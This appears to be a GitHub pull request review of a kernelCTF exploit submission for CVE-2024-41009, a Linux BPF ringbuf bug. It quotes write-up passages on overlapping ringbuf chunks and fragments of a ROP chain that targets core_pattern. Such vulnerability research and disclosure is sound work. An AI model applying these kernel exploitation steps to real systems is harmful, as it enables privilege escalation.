Add kernelCTF CVE-2024-41009_lts_cos #118
Conversation
koczkatamas
force-pushed
the
master
branch
2 times, most recently
from
b2e2b9f to
43a5a81
Compare
| ``` | ||
| And return `(void *)hdr + BPF_RINGBUF_HDR_SZ` for ebpf program to use. ebpf program is unable to modify `bpf_ringbuf_hdr` due to it is outside of memory chunk. | ||
|
|
||
| But with malformed `&rb->consumer_pos`, it's possible to make second allocated memory chunk overlapping with first chunk. |
There was a problem hiding this comment.
Could you specifically add that consumer_pos and producer_pos are editable because you can mmap() them in userspace? This isn't entirely clear from the write-up.
|
|
||
| //0x0000000000005f3a : pop rdi ; ret | ||
| *(rop++) = stext + 0x0000000000005f3a; | ||
| *(rop++) = 0x10000000; |
There was a problem hiding this comment.
Could you document, what this constant does?
| *(rop++) = 0xa00000; | ||
| //0x0000000000028245 : pop rdx ; ret | ||
| *(rop++) = stext + 0x0000000000028245; | ||
| *(rop++) = 0x20; |
There was a problem hiding this comment.
Could you document, what this constant does?
| *(rop++) = stext + core_pattern; | ||
| //0x0000000000006277 : pop rsi ; ret | ||
| *(rop++) = stext + 0x0000000000006277; | ||
| *(rop++) = 0xa00000; |
There was a problem hiding this comment.
Could you document, what this constant does?
|
|
||
| #define LOG_BUF_SIZE 65536 | ||
|
|
||
| #define BPF_HEAVY_JOB \ |
There was a problem hiding this comment.
This isn't used right? Could you remove the parts that are unused so that it's clearer for other readers? :)
| ``` | ||
|
|
||
| # Exploit | ||
| We modify `pg_off` of chunk A to `2`, so the meta pages that calculated with `bpf_ringbuf_restore_from_rec` will point to our controlled content at mmap-ed consumer pos data. |
There was a problem hiding this comment.
Can you add why changing this to 2 will point to the mmaped data?
|
Thanks for the review @JordyZomer. |
|
Thanks for the changes @d4em0n ! |
No description provided.